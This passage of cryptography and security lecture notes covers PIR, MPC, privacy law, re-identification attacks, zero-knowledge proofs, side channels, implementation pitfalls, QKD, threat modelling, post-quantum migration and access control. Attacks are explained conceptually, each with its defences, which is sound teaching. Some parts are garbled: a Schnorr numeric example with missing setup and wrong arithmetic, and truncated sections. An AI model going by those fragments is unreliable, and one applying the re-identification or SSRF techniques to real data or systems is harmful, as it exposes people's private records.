Alice picks a uniformly random subset \(S \subseteq [n]\) and sends \(S\) to S1 and \(S \Delta \{i\}\) (the symmetric difference) to S2. Each server responds with the XOR of the bits indexed by the received set: S1 sends \(a_1 = \bigoplus_{j \in S} x_j\) and S2 sends \(a_2 = \bigoplus_{j \in S \Delta \{i\}} x_j\). Alice computes \(a_1 \oplus a_2 = x_i\), the desired bit. Correctness: \(a_1 \oplus a_2 = \bigoplus_{j \in S} x_j \oplus \bigoplus_{j \in S \Delta \{i\}} x_j = x_i\) (the XOR telescopes, leaving only \(x_i\)).
Privacy: S1 sees only \(S\), a uniformly random subset — independent of \(i\). S2 sees \(S \Delta \{i\}\), also a uniformly random subset (because \(S\) was random). Neither server can distinguish this query from one for any other index. Communication cost: \(O(n)\) bits per server (to describe the subsets), which is not better than downloading the whole database. Sublinear PIR requires recursion or algebraic constructions, achieving \(O(n^{1/3})\) communication at the cost of additional servers.
The BGW Protocol and Arithmetic Circuits
For multi-party computation over arithmetic operations (addition, multiplication of numbers rather than bits), the BGW protocol (Ben-Or, Goldwasser, Wigderson 1988) provides information-theoretic MPC for \(n\) parties against up to \(t < n/3\) malicious corruptions (or \(t < n/2\) semi-honest).
The protocol computes any arithmetic circuit over a finite field using Shamir secret sharing as the underlying primitive. Addition gates are free: given shares \([a]_i, [b]_i\) of secrets \(a, b\), each party computes \([a+b]_i = [a]_i + [b]_i\) locally (no communication needed, since polynomial addition is linear). Multiplication gates are expensive: multiplying two degree-\((t)\) Shamir sharings produces a degree-\((2t)\) sharing; reducing back to degree \(t\) requires an interactive resharing step (one round of communication).
Internet Censorship Architecture
National censorship systems combine multiple techniques:
- DNS hijacking/poisoning: return false IP addresses for blocked domains
- IP blocking: block packets to/from specific IP ranges
- Keyword filtering via DPI: inspect packet payloads for banned strings; discard or reset connections
- BGP route injection: divert traffic at the routing level
The GFW actively probes suspected circumvention servers: when an obfs4 bridge is discovered, the GFW initiates a connection and characterises the handshake to identify the protocol. Defences must maintain cryptographic undetectability of the circumvention handshake.
Censorship measurement platforms (OONI — Open Observatory of Network Interference) deploy probes in censored networks to document what is blocked and how.
Surveillance Capitalism and Tracking
Shoshana Zuboff’s concept of surveillance capitalism describes how companies collect behavioural data as a raw material, refine it into predictive products, and sell predictions to advertisers and other buyers — creating incentives to maximise data collection.
Third-party tracking: websites load resources from tracking domains (Google Analytics, Facebook Pixel); these third parties observe browsing behaviour across sites via cookies. Browser fingerprinting identifies users without cookies using the combination of browser version, fonts, canvas rendering, and dozens of other attributes — largely stateless and unkillable by cookie blocking. Supercookies use browser storage mechanisms (localStorage, IndexedDB, HSTS cache) that survive cookie clearing.
GDPR (EU, 2018) and CCPA (California, 2020) mandate consent for data collection, data subject access rights, and the right to erasure. Enforcement has been uneven; GDPR fines have reached hundreds of millions of euros (Meta: €1.2B in 2023).
Chapter 9: Privacy Regulations and Re-identification Research
Privacy Regulation Landscape
The legal framework for data privacy has developed unevenly across jurisdictions, creating a patchwork of obligations that multinational organisations must navigate simultaneously.
GDPR (General Data Protection Regulation), effective May 2018 in the European Union, is the most comprehensive and influential privacy law currently in force. It applies to any organisation that processes personal data of EU residents, regardless of where the organisation is based. Core principles: (1) lawfulness, fairness, and transparency — processing requires a legal basis, most often consent or legitimate interest; (2) purpose limitation — data collected for one purpose may not be repurposed without fresh legal basis; (3) data minimisation — only the minimum data necessary for the stated purpose may be collected; (4) accuracy, storage limitation, integrity and confidentiality. Data subjects hold several rights: the right of access (obtain a copy of their data), the right to rectification (correct inaccurate data), the right to erasure (“right to be forgotten”), the right to portability (receive data in a machine-readable format), and the right to object to automated decision-making. Fines reach up to 4% of annual global turnover or €20M, whichever is greater. The GDPR has prompted significant structural changes: cookie consent banners, data protection officers, privacy impact assessments, and cross-border data transfer mechanisms (Standard Contractual Clauses, now under the EU-US Data Privacy Framework after Schrems II invalidated Privacy Shield in 2020).
CCPA (California Consumer Privacy Act), effective January 2020 (strengthened by CPRA in 2023), grants California residents the right to know what personal information is collected, the right to opt out of the sale of personal information to third parties, the right to deletion, and the right to non-discrimination for exercising these rights. Unlike GDPR, CCPA does not require a legal basis for processing — it operates as an opt-out regime rather than opt-in. CCPA covers businesses with over $25M in annual revenue, or those that buy/sell data on 50,000+ consumers, or derive 50%+ of revenue from selling data.
COPPA (Children’s Online Privacy Protection Act), effective since 2000 in the United States, prohibits collecting personal information from children under 13 without verifiable parental consent. Operators of websites and online services directed at children must post privacy notices, provide parents with access to and the ability to delete their child’s data, and cannot condition participation on disclosure of more information than necessary. The FTC actively enforces COPPA; YouTube was fined $170M in 2019 for collecting data on child users without consent.
If personal data is written to a public blockchain (for example, a user’s name or medical record hash embedded in a transaction), it cannot be “erased” in any GDPR-compliant sense. Proposed mitigations include: (1) storing personal data off-chain and putting only a cryptographic hash on-chain (but the hash itself may constitute personal data under GDPR, particularly if it is linkable to an individual); (2) crypto-shredding — encrypting the data with a key stored off-chain and then deleting the key, rendering the on-chain ciphertext meaningless without technically removing it (regulators have not uniformly accepted this as genuine erasure); (3) using permissioned blockchains with a central administrator who can redact records (which undermines decentralisation). This tension is a fundamental architectural incompatibility, not a solvable engineering problem. Organisations building blockchain-based systems that handle personal data of EU residents must design carefully to avoid storing personal data on-chain in the first place.
Re-identification Research
The field of re-identification research studies the gap between the formal notion of “anonymised data” and the practical reality of what auxiliary information an adversary can exploit.
Sweeney did not merely compute statistics. She demonstrated the attack concretely: she purchased the Massachusetts Group Insurance Commission hospital discharge dataset, which contained patients’ ZIP codes, birthdates, genders, and medical diagnoses (but not names — the state had “anonymised” the data by removing direct identifiers). She separately purchased the Cambridge, MA voter registration rolls, which contained names, ZIP codes, birthdates, and genders. By joining the two datasets on (ZIP, gender, birthdate), she identified the complete medical record — diagnoses, prescriptions, and physician notes — of the Governor of Massachusetts, William Weld, and mailed it to him.
The immediate policy consequence was the HIPAA (Health Insurance Portability and Accountability Act) Safe Harbour provision, which defines 18 specific data elements that must be removed or generalised before health data can be considered de-identified for purposes of research sharing: name, geographic subdivisions smaller than state, dates more specific than year, phone numbers, fax numbers, email addresses, SSN, medical record numbers, health plan beneficiary numbers, account numbers, certificate and license numbers, VINs, device serial numbers, URLs, IP addresses, biometric identifiers, full-face photographs, and any other unique identifying numbers. The Safe Harbour provision operationalises the lesson: the joint distribution of innocuous-seeming demographic attributes uniquely identifies individuals at scale.
The attack required: a target’s IMDb public ratings page (publicly available for users who rate movies on IMDb), matching against the Netflix dataset using a Bayesian approach that tolerated noise. In experiments with 50 users with known IMDb profiles, they correctly identified 68% using only 2 movies with approximate dates, and over 99% with 8 movies. Netflix had originally planned a second data release; the research led them to cancel it. The Federal Trade Commission subsequently cited this work in regulatory guidance, and it became a touchstone for the inadequacy of naive anonymisation.
The lesson extends beyond Netflix. It is now understood that the set of attributes that constitute quasi-identifiers cannot be enumerated in advance, because auxiliary datasets are unbounded — any combination of released attributes might be linkable to some auxiliary source. This is precisely what differential privacy addresses: its guarantee holds regardless of what auxiliary information the adversary possesses, because it bounds the privacy loss in terms of adjacent databases, not in terms of an enumerated quasi-identifier set.
Chapter 10: Zero-Knowledge Proofs
A zero-knowledge proof (ZKP) is an interactive or non-interactive protocol in which a prover convinces a verifier that a statement is true without revealing why it is true — that is, without revealing any witness or secret beyond the truth of the statement itself. ZKPs are among the most important cryptographic primitives, with applications ranging from authentication protocols to blockchain privacy (zk-SNARKs in Zcash and Ethereum rollups).
10.1 Definition and Properties
- Completeness: if the statement \(x \in L\) is true, an honest prover with witness \(w\) convinces the verifier — \(\Pr[\text{V accepts}] = 1\).
- Soundness: if \(x \notin L\), no (possibly computationally unbounded) cheating prover convinces the verifier except with negligible probability \(\leq \epsilon\).
- Zero-knowledge: there exists a probabilistic polynomial-time simulator S such that, for any \(x \in L\), the output of \(S(x)\) is computationally indistinguishable from the transcript of an honest execution (P(x,w), V(x)). Since S has no witness, this formalises that the verifier learns nothing beyond \(x \in L\).
The simulator exists because every transcript can be simulated — any verifier strategy could have generated the same-looking transcript on its own, without learning any secret from the actual interaction. The zero-knowledge property is a rigorous formalisation of “nothing extra is revealed.”
10.2 Schnorr Identification Protocol
The Schnorr protocol (1989) is the prototype interactive ZKP. It proves knowledge of a discrete logarithm:
Statement: I know \(x\) such that \(h = g^x\) in a group \(\mathbb{G}\) of prime order \(q\).
- Commit: Prover picks random \(r \leftarrow \mathbb{Z}_q\), sends \(R = g^r\) (commitment).
- Challenge: Verifier picks random \(c \leftarrow \mathbb{Z}_q\) and sends \(c\).
- Response: Prover computes \(s = r + cx \bmod q\) and sends \(s\).
- Verify: Verifier accepts iff \(g^s = R \cdot h^c\).
Verify: \(g^s = 2^0 = 1\). But \(R \cdot h^c = 5 \cdot 8^2 = 5\cdot64 = 5\cdot9 = 45 \equiv 1 \pmod{11}\). ✓
Security: The commitment \(R = g^r\) uses fresh randomness every session; without knowing \(r\), no eavesdropper can compute \(x\) from \((R, c, s)\) — this would require solving DLOG. The zero-knowledge property holds because the simulator can produce valid-looking transcripts by picking \(s\) and \(c\) first, then computing \(R = g^s/h^c\) — bypassing the need to know \(x\).
10.3 Fiat–Shamir Heuristic: Non-Interactive ZKPs
The Fiat–Shamir transform converts an interactive ZKP (Schnorr-type) into a non-interactive proof by replacing the random verifier challenge with a hash of the transcript so far:
Fiat–Shamir proofs are digital signatures in disguise: Schnorr + Fiat–Shamir = Schnorr signatures. The security of the Fiat–Shamir transform relies on the random oracle model for \(H\); it has been shown to be insecure for arbitrary interactive proofs with non-uniform extractors, but is secure in the random oracle model for Schnorr-like protocols.
10.4 zk-SNARKs and Succinct Proofs
A zk-SNARK (Zero-Knowledge Succinct Non-Interactive Argument of Knowledge) is a non-interactive ZKP where the proof size and verification time are both very small (constant or logarithmic in the circuit size), enabling proof of arbitrary NP statements:
- Succinctness: proof size is \(O(\lambda)\) or \(O(\text{poly}(\lambda) \log N)\), independent (or nearly so) of the statement size \(N\).
- Non-interactivity: a single proof string suffices (no rounds).
- Argument of knowledge: a cheating prover cannot produce an accepting proof without knowing the witness (under cryptographic assumptions).
- Zero-knowledge: the proof reveals nothing beyond statement validity.
The Groth16 zk-SNARK (2016) produces proofs of 3 group elements regardless of the computation size, verifiable in milliseconds. It powers Zcash’s shielded transactions: a user proves knowledge of a spending key and consistency of transaction amounts without revealing either. Ethereum Layer-2 rollups (zkSync, StarkNet) use zk-SNARKs/STARKs to prove correct execution of thousands of transactions in a single on-chain proof, reducing gas costs by 10–100×.
Chapter 11: Side-Channel Attacks
Side-channel attacks exploit information leaked through the physical implementation of a cryptographic algorithm — timing, power consumption, electromagnetic radiation, or acoustic emanations — rather than weaknesses in the algorithm itself. Mathematically perfect algorithms can be completely broken by side-channel attacks on their implementations.
11.1 Timing Attacks
Timing attacks (Kocher 1996) exploit the fact that many implementations take variable time depending on secret data. RSA implemented with a simple square-and-multiply loop that skips the “multiply” step when a key bit is 0 leaks the key bit through the timing difference.
Kocher’s original attack (1995) recovered 512-bit and 1024-bit RSA private keys from timing measurements of a smart card, using approximately 300,000 queries. The attack is a statistical estimation problem: for each candidate bit value, the predicted timing for a batch of known plaintexts is computed; the correlation between predicted and measured times reveals the true bit.
The countermeasure is Montgomery multiplication with constant-time implementation: perform the multiplication in every step regardless of the key bit (using dummy operations or always-on multiply), and ensure that the code executes in constant time by removing all data-dependent branches and memory accesses. Modern cryptographic libraries (BoringSSL, mbedTLS) implement RSA in constant time; failure to do so has resulted in critical vulnerabilities (Lucky13, ROBOT).
11.2 Power Analysis Attacks
Simple Power Analysis (SPA) reads a single power trace and identifies operations (squarings vs. multiplications) by visual inspection. Differential Power Analysis (DPA) (Kocher, Jaffe, Jun 1999) uses statistical analysis of many power traces to recover AES keys:
11.3 Spectre and Meltdown: Microarchitectural Side Channels
Modern processors execute instructions speculatively and out-of-order for performance. Meltdown (Lipp et al., 2018) and Spectre (Kocher et al., 2018) are microarchitectural side-channel attacks that exploit this speculation:
Meltdown: The CPU transiently (speculatively) executes memory accesses to kernel memory before the memory-protection fault is delivered, leaving traces in the CPU cache. An attacker reads these traces via a cache timing side channel (Flush+Reload): measure which cache lines are warm to determine which kernel memory address was transiently loaded. This allows any user-space process to read all of kernel memory. Patched by kernel page-table isolation (KPTI), which unmaps the kernel’s page tables during user-space execution at a 5–30% performance cost.
Spectre: Tricks the CPU’s branch predictor into speculatively executing code it should not execute, leaking information from across security boundaries (e.g., from another process or from the hypervisor). Unlike Meltdown (patched in hardware and OS), Spectre variants remain fundamentally difficult to patch because they exploit the inherent CPU optimisation of speculative execution.
Chapter 12: Applied Cryptography Engineering
Cryptographic algorithms are only as secure as their implementations. This chapter surveys common implementation pitfalls and the engineering principles that prevent them.
12.1 Padding Oracle Attacks
A padding oracle attack (Vaudenay 2002) exploits a server that reports whether a decrypted ciphertext has valid PKCS#7 padding — a single bit of information — to decrypt arbitrary ciphertexts.
POODLE (2014) exploited this against SSLv3 CBC; Lucky13 (2013) exploited the timing difference in HMAC verification in TLS 1.0/1.1. The correct fix is Encrypt-then-MAC: compute the MAC over the ciphertext, and verify the MAC in constant time before decrypting. If the MAC fails, reject immediately — the recipient never decrypts, so there is no padding oracle. AEAD modes (AES-GCM) are immune by construction.
12.2 Nonce Reuse and Its Consequences
Many AEAD modes require a unique nonce (number used once) per encryption under a given key. Nonce reuse is catastrophic:
- AES-GCM nonce reuse: if two messages \(m_1, m_2\) are encrypted under the same (key, nonce) pair in GCM, the XOR of ciphertexts equals the XOR of plaintexts \(c_1 \oplus c_2 = m_1 \oplus m_2\). Knowing either message immediately reveals the other. Worse, the authentication key \(H\) can be recovered from the two authentication tags, allowing the attacker to forge arbitrary authenticated ciphertexts indefinitely. This broke the PS3’s RSA signing key (Sony used a constant \(r\) in ECDSA, which is equivalent to nonce reuse) and various TLS session resumption implementations.
The lesson: nonce management is a primary engineering concern. Use XChaCha20-Poly1305 (extended nonce, safe for random generation even at scale) or AES-SIV (deterministic AEAD, produces identical ciphertexts for identical plaintexts but is nonce-misuse resistant) for contexts where nonce uniqueness cannot be guaranteed.
12.3 Length Extension Attacks on Hash Functions
MD5 and SHA-1/SHA-2 use the Merkle–Damgård construction: hash is computed by initialising a state with a fixed IV and repeatedly applying a compression function. Given \(H(m)\) and \(\text{len}(m)\), an attacker can compute \(H(m \| \text{padding} \| m')\) for any extension \(m'\) without knowing \(m\). This breaks the naive MAC construction \(\text{MAC}(k, m) = H(k \| m)\): knowing the tag on \(m\) allows forging the tag on \(m \| \text{padding} \| m'\).
The fix is HMAC: \(\text{HMAC}(k, m) = H(k \oplus \texttt{opad} \| H(k \oplus \texttt{ipad} \| m))\). The double hashing prevents length extension. SHA-3 (Keccak) uses a sponge construction rather than Merkle–Damgård and is immune to length extension by design.
Chapter 13: Quantum Cryptography
Classical cryptography relies on computational hardness assumptions: problems like integer factorisation are believed to be hard for classical computers, but Shor’s algorithm solves them in polynomial time on a quantum computer. Quantum cryptography offers two distinct responses to this threat: (1) protocols whose security is based on the laws of physics rather than computational hardness, and (2) post-quantum cryptography (classical algorithms believed to be hard for both classical and quantum computers — already covered in the companion CO 485 notes).
13.1 BB84 Quantum Key Distribution
The BB84 protocol (Bennett and Brassard, 1984) is the first and most studied quantum key distribution (QKD) scheme. It allows two parties, Alice and Bob, to establish a shared secret key with security guaranteed by the laws of quantum mechanics, not computational assumptions.
- Rectilinear basis (+): horizontal polarisation = 0, vertical = 1.
- Diagonal basis (×): 45° polarisation = 0, 135° = 1.
13.2 Security of BB84
The security of BB84 follows from two principles of quantum mechanics:
No-cloning theorem: an unknown quantum state cannot be copied. An eavesdropper Eve cannot clone the photon, measure it, and forward the original — she must interact with the photon and thereby disturb it.
Measurement disturbs state: measuring a photon in the wrong basis produces a random result and collapses the state. Eve’s interception introduces errors in Bob’s measurements: if Eve intercepts every photon (measuring in a random basis and resending), she introduces a 25% QBER in the sifted key. The threshold for aborting (11%) detects even Eve intercepting 44% of photons — the information-theoretic security proof (Lo and Chau 1999; Shor and Preskill 2000) shows that BB84 is unconditionally secure (composably secure) against arbitrary quantum eavesdropping, with key length depending only on the observed QBER.
- Photon number splitting attacks: practical laser sources emit multi-photon pulses with some probability. Eve can split off one photon from a multi-photon pulse and store it until the basis is announced, then measure in the correct basis. This bypasses the no-cloning argument. The decoy-state method (Hwang 2003; Lo et al. 2005) uses random pulse intensities to detect photon-splitting attacks.
- Distance limitation: photon loss in optical fibre grows exponentially with distance (~0.2 dB/km for telecom fibre). Commercial QKD systems (Toshiba, ID Quantique) operate up to ~100km without quantum repeaters; the Chinese Micius satellite demonstrated 1200km ground-to-satellite QKD in 2017.
- Side channels in the hardware: QKD implementations have been broken by side-channel attacks on the detectors (detector blinding attacks, time-shift attacks). The device-independent QKD (DI-QKD) model closes these loopholes but requires near-perfect Bell inequality violation, currently impractical.
Chapter 14: Threat Modelling and Security Engineering
Cryptographic primitives are only components of secure systems. This chapter discusses how to reason about security at the system level: identifying what needs to be protected, from whom, and how.
14.1 STRIDE Threat Modelling
The STRIDE model (Microsoft, Shostack 2014) systematically enumerates threats along six dimensions:
- Spoofing identity: an attacker impersonates a legitimate user or system. Countermeasure: strong authentication (passwords, 2FA, mutual TLS).
- Tampering with data: unauthorised modification of data in transit or at rest. Countermeasure: integrity checks (HMAC, digital signatures, filesystem integrity monitoring).
- Repudiation: a user or system denies performing an action. Countermeasure: audit logs, digital signatures (non-repudiation).
- Information disclosure: confidential data is exposed. Countermeasure: encryption, access control, data classification.
- Denial of service: a system is made unavailable. Countermeasure: rate limiting, load balancing, DDoS mitigation.
- Elevation of privilege: attacker gains higher access than authorised. Countermeasure: least privilege, privilege separation, sandboxing.
14.2 Attack Trees and Kill Chains
An attack tree decomposes a top-level security goal into subgoals using AND/OR decomposition. The root is the attacker’s goal; leaves are primitive attacks. AND nodes require all children; OR nodes require at least one. Attack trees enable systematic enumeration of attack paths and assignment of cost, probability, or detection difficulty to each leaf.
The cyber kill chain (Lockheed Martin 2011) models advanced persistent threats as a sequence of stages: Reconnaissance → Weaponisation → Delivery → Exploitation → Installation → Command and Control → Actions on Objectives. Breaking the kill chain at any stage (e.g., detecting the C&C beaconing before exfiltration) defeats the attack. This stage-based model underlies modern security operations centre (SOC) playbooks and SIEM (Security Information and Event Management) alerting logic.
14.3 Defence in Depth
Defence in depth is the security architecture principle of deploying multiple independent layers of security controls so that the failure of any single control does not result in total compromise. Each layer assumes the outer layers may have already failed:
- Network layer: firewalls, network segmentation, IDS/IPS.
- Host layer: endpoint detection and response (EDR), host firewalls, OS hardening, full-disk encryption.
- Application layer: input validation, output encoding (preventing XSS, SQL injection), CSRF tokens, security headers.
- Identity layer: MFA, privileged access management (PAM), just-in-time access.
- Data layer: encryption at rest, tokenisation of sensitive fields (e.g., PAN data), data loss prevention (DLP).
- Process layer: security awareness training, patch management, incident response planning, penetration testing.
14.4 Common Vulnerability Patterns
SQL Injection (SQLi): User-supplied input is concatenated directly into an SQL query. The attacker provides input that alters the query structure, extracting the entire database or bypassing authentication. Prevention: parameterised queries (prepared statements) in which user input is always treated as data, never as SQL syntax.
Cross-site scripting (XSS): A web application echoes user input in a page without sanitisation; an attacker injects <script> tags that execute in victims’ browsers. Consequences: cookie theft (session hijacking), defacement, phishing. Prevention: context-sensitive output encoding (HTML encode <, >, &, " before rendering in HTML context) and Content Security Policy (CSP) headers.
Insecure deserialisation: Applications deserialise user-controlled data using language-native object serialisation (Java, PHP, Python pickle). Attackers craft malicious payloads that, when deserialised, execute arbitrary code via gadget chains in the application’s class path. Prevention: never deserialise from untrusted sources; use data-only formats (JSON, Protocol Buffers) instead of object serialisation.
SSRF (Server-Side Request Forgery): An application makes HTTP requests to URLs controlled by the user, allowing an attacker to probe internal network services (AWS metadata endpoint at 169.254.169.254, Redis, internal admin APIs) that are inaccessible from the public internet. The Capital One breach (2019) exploited an SSRF in a WAF to extract AWS IAM credentials from the instance metadata endpoint, compromising 100 million customer records.
These four vulnerability classes — SQLi, XSS, insecure deserialisation, SSRF — recur in the OWASP Top 10 across every year of the list. Understanding their root cause (failure to separate code from data) is more valuable than memorising specific payloads.
Chapter 15: Formal Security Proofs and Reduction-Based Cryptography
Modern cryptography is a mathematical discipline: every claimed security result is a proof. A security proof is a reduction demonstrating that breaking the proposed scheme is at least as hard as solving a well-studied problem (RSA, CDH, LWE). If no efficient algorithm for the hard problem is known, the reduction implies no efficient attack on the scheme.
15.1 The Security Game Framework
Security properties are defined via security games between a challenger \(\mathcal{C}\) and an adversary \(\mathcal{A}\):
- Setup: \(\mathcal{C}\) generates a key \(k \leftarrow \text{Gen}(1^\lambda)\).
- Learning phase: \(\mathcal{A}\) may adaptively query \(\mathcal{C}\) for encryptions of chosen plaintexts (unlimited queries).
- Challenge: \(\mathcal{A}\) submits two equal-length messages \(m_0, m_1\). \(\mathcal{C}\) picks \(b \leftarrow \{0,1\}\) uniformly and returns \(c^* = \text{Enc}_k(m_b)\).
- Guess: \(\mathcal{A}\) outputs \(b'\). \(\mathcal{A}\) wins if \(b' = b\).
15.2 Reduction-Based Security
A security reduction shows that any efficient adversary breaking the scheme can be converted into an efficient algorithm solving the underlying hard problem:
\(D\) receives oracle access to either AES\(_k\) (for a random key \(k\)) or a truly random permutation \(\pi\). \(D\) simulates the IND-CPA challenger for \(\mathcal{A}\): for each encryption query \(m\), pick a fresh nonce \(N\) and compute the keystream by querying the oracle on \((N, 1), (N, 2), \ldots\); XOR with \(m\). When \(\mathcal{A}\) submits \(m_0, m_1\), encrypt \(m_b\) the same way. Feed the ciphertext to \(\mathcal{A}\) and output \(1\) iff \(\mathcal{A}\) guesses correctly.
If the oracle is AES\(_k\), this is a perfect simulation of the IND-CPA game, so \(D\) outputs 1 with probability \(1/2 + \epsilon\). If the oracle is a random permutation \(\pi\), the keystream is uniformly random (since nonces are fresh), so the ciphertext is a one-time pad and \(\mathcal{A}\) wins with probability exactly \(1/2\). Hence \(D\)’s advantage is \(\epsilon\) — contradicting the PRP assumption if \(\epsilon\) is non-negligible.
This template — simulate the scheme’s challenger using the hard-problem oracle, extract the adversary’s advantage as the distinguisher’s advantage — underlies nearly every security proof in modern symmetric and public-key cryptography.
15.3 The Random Oracle Model
Many practical constructions (Fiat–Shamir, OAEP padding for RSA, PSS signatures) are proved secure in the random oracle model (ROM): all hash function calls are modelled as calls to a truly random function (an oracle) that returns a uniformly random output for each new query and the same output for repeated queries. The ROM proof strategy:
- Model \(H\) as a random oracle accessible to all parties (including adversary).
- Program the random oracle to embed the hard problem into the proof.
- Show that any adversary winning the security game must either solve the hard problem or detect that the oracle was “programmed” (impossible if the programming is indistinguishable from truly random).
ROM proofs are not unconditionally sound (Canetti, Goldreich, Halevi 1998 showed that some ROM-secure schemes are insecure when \(H\) is instantiated by any concrete function), but they are widely accepted as evidence of security in practice, and no concrete ROM-based scheme has been broken via this theoretical gap.
Chapter 16: Post-Quantum Transition
The standardisation of post-quantum cryptographic algorithms by NIST in 2024 marks the beginning of a long transition period. This chapter surveys the migration challenges and the current state of post-quantum deployment.
16.1 NIST Post-Quantum Standards
In August 2024, NIST finalized three primary post-quantum standards:
- ML-KEM (Kyber, FIPS 203): a key encapsulation mechanism based on Module-LWE. Replaces ECDH for key agreement. Parameters: Kyber-768 provides 128-bit post-quantum security with 1184-byte public keys and 1088-byte ciphertexts — much larger than a 32-byte EC public key but practical for TLS.
- ML-DSA (Dilithium, FIPS 204): a digital signature scheme based on Module-LWE/SIS. Signatures are 2420–4595 bytes depending on parameter set. Already deployed in Linux kernel signing experiments and Let's Encrypt test deployments.
- SLH-DSA (SPHINCS+, FIPS 205): a hash-based signature scheme relying only on the collision resistance of a hash function. Extremely conservative (security depends only on hash functions), but large signatures (8–50 KB). Suitable for firmware signing where signature size is not a bottleneck.
16.2 Hybrid Key Exchange
The TLS 1.3 working group has standardised hybrid key exchange (RFC 8446 extension): the shared secret is the concatenation of a classical ECDH secret and a post-quantum KEM secret, providing security against both classical and quantum adversaries. Even if one of the two algorithms is later found to be broken (either classically or quantumly), the session is still protected by the other. Google and Cloudflare have been deploying hybrid ECDH+Kyber in Chrome and TLS endpoints since 2023 in preparation for the post-quantum transition.
16.3 Migration Challenges
Migrating public-key infrastructure to post-quantum algorithms is a decade-long engineering project with several specific challenges:
Key and signature size: RSA-2048 public keys are 256 bytes; Kyber-768 public keys are 1184 bytes. In constrained environments (IoT devices, embedded systems with limited RAM/flash), this may require hardware upgrades.
TLS handshake overhead: Larger key exchange messages increase TLS handshake sizes. For mobile devices on high-latency connections, this increases connection setup latency measurably. Kyber has been designed with this in mind (it is fast and compact for a post-quantum KEM), but Dilithium signatures are significantly larger than ECDSA signatures.
Certificate chains: X.509 certificates in the public PKI chain public keys and signatures. A full certificate chain (root CA → intermediate CA → leaf) with Dilithium signatures would be several kilobytes, compared to under 5KB for the current RSA/ECDSA chain. This affects every HTTPS connection.
Cryptographic agility: Systems must be designed for cryptographic agility — the ability to swap algorithms without major re-engineering — since post-quantum algorithms are newer and may yet have vulnerabilities discovered. The Rainbow signature scheme, a NIST finalist, was broken by a single researcher in a weekend in 2022; the SIKE (isogeny-based) KEM was broken classically in 2022 in an hour on a laptop. Hybrid approaches and agile architectures protect against such surprises.
Chapter 17: Access Control and Authentication
Cryptographic mechanisms secure the channel and authenticate message integrity, but access control determines which authenticated principals may access which resources. Access control and authentication are complementary layers of the security stack.
17.1 Authentication Factors and Multi-Factor Authentication
Authentication proves identity via one or more factors:
- Knowledge factor (something you know): passwords, PINs, security questions.
- Possession factor (something you have): TOTP tokens (Google Authenticator), FIDO2 hardware keys (YubiKey), smart cards.
- Inherence factor (something you are): biometrics (fingerprint, face recognition, voice).
TOTP (Time-based One-Time Password, RFC 6238): a HMAC-based OTP using the current Unix time divided by a 30-second window: \(\text{OTP} = \text{HOTP}(K, \lfloor t/30 \rfloor)\) where \(\text{HOTP}(K, c) = \text{Truncate}(\text{HMAC-SHA1}(K, c))\). The 6-digit OTP is valid for 30 seconds. TOTP requires no network communication and is phishing-resistant if users verify the domain before entering.
FIDO2 / WebAuthn: eliminates shared secrets entirely. During registration, the authenticator generates a keypair; the public key is stored at the server, the private key stays on the device. During authentication, the authenticator signs a challenge (including the origin domain) with the private key. This is phishing-resistant because the signed challenge includes the actual domain — a phishing site with a lookalike domain receives a signature over the wrong origin and cannot use it for the real site.
17.2 Access Control Models
- ACL (Access Control List): per-object column of (subject, permissions) pairs. Unix file permissions and NTFS ACLs use this model. Efficiently answers "who can access this file?"
- Capability list: per-subject row of (object, permissions) pairs. Capability-based systems (Capsicum, seL4) use this model. Efficiently answers "what can this process access?"
Mandatory Access Control (MAC): the OS enforces security labels — subjects and objects are assigned classification levels (Top Secret > Secret > Confidential > Unclassified). The Bell-LaPadula model enforces: no read up (a subject cannot read objects at a higher classification than their clearance) and no write down (a subject cannot write to objects at a lower classification, preventing leak). MAC is used in military and government systems (SELinux, AppArmor implement MAC for Linux).
Role-Based Access Control (RBAC): permissions are assigned to roles, and users are assigned to roles. RBAC simplifies administration in large organisations: a new employee is assigned the appropriate role and immediately inherits the correct permissions, without the administrator needing to enumerate individual permissions. The principle of least privilege — granting only the minimum permissions needed for a task — is more easily enforced with RBAC than with arbitrary ACL entries.
17.3 PKI and Certificate Chains
Public Key Infrastructure (PKI) solves the key distribution problem for public-key cryptography at scale: how does Alice know that the public key \(pk_B\) actually belongs to Bob? PKI answers this via a chain of trust:
- A Certificate Authority (CA) digitally signs a certificate binding a domain name to a public key: \(\text{Cert} = (\text{domain}, pk, \text{validity}, \ldots, \text{Sig}_{CA}(\text{domain}, pk, \ldots))\).
- Browsers trust a fixed set of root CAs (embedded in the OS/browser trust store; approximately 100–150 root CAs are trusted by default in Chrome and Firefox).
- Root CAs sign intermediate CA certificates; intermediates sign leaf certificates. The chain from leaf to root establishes trust.
Certificate revocation is the Achilles’ heel of PKI: when a private key is compromised, the associated certificate must be revoked. OCSP (Online Certificate Status Protocol) allows real-time revocation queries, but most browsers use OCSP stapling (the server includes a signed OCSP response in the TLS handshake) or CRLsets (pre-downloaded revocation lists). The 2011 DigiNotar breach — a Dutch CA was compromised, and attackers issued fraudulent certificates for google.com, used to MITM Iranian users — led to DigiNotar being removed from all trust stores and its bankruptcy within weeks. Certificate Transparency (CT, RFC 6962) addresses this systemically: all CAs are required to log every certificate they issue to public, append-only Merkle-tree logs; browsers require SCTs (Signed Certificate Timestamps) proving log inclusion before accepting a certificate. This makes fraudulent certificate issuance detectable.
Summary: Security Primitives at a Glance
| Goal | Primitive | Standard | Notes |
|---|---|---|---|
| Confidentiality | AES-256-GCM | NIST FIPS 197 | AEAD; fresh nonce required |
| Integrity + auth | HMAC-SHA-256 | RFC 2104 | Constant-time comparison required |
| Key agreement | X25519 + Kyber-768 | RFC 7748, FIPS 203 | Hybrid for PQ transition |
| Digital signatures | Ed25519 / ML-DSA | RFC 8032, FIPS 204 | Ed25519 for classical, ML-DSA for PQ |
| Password hashing | Argon2id | RFC 9106 | Memory-hard; bcrypt/scrypt acceptable |
| Key derivation | HKDF-SHA-256 | RFC 5869 | Extract-then-expand pattern |
| Secure channel | TLS 1.3 | RFC 8446 | Mandatory for all network comms |
| Zero-knowledge | Schnorr / zk-SNARK | FIPS 186 (Schnorr) | SNARKs for blockchain privacy |
Chapter 18: Privacy-Preserving Machine Learning
Machine learning systems trained on personal data face a fundamental privacy tension: the model must learn from individual data points, yet individuals should not be identifiable from the trained model. Privacy-preserving ML addresses this at the model training and inference stages.
18.1 Differential Privacy in Machine Learning
The standard mechanism for private ML is DP-SGD (Differentially Private Stochastic Gradient Descent, Abadi et al. 2016): at each training step, gradients are clipped to a maximum L2 norm (limiting the influence of any single example), Gaussian noise is added to the clipped gradients, and the noisy gradients are used to update the model weights.
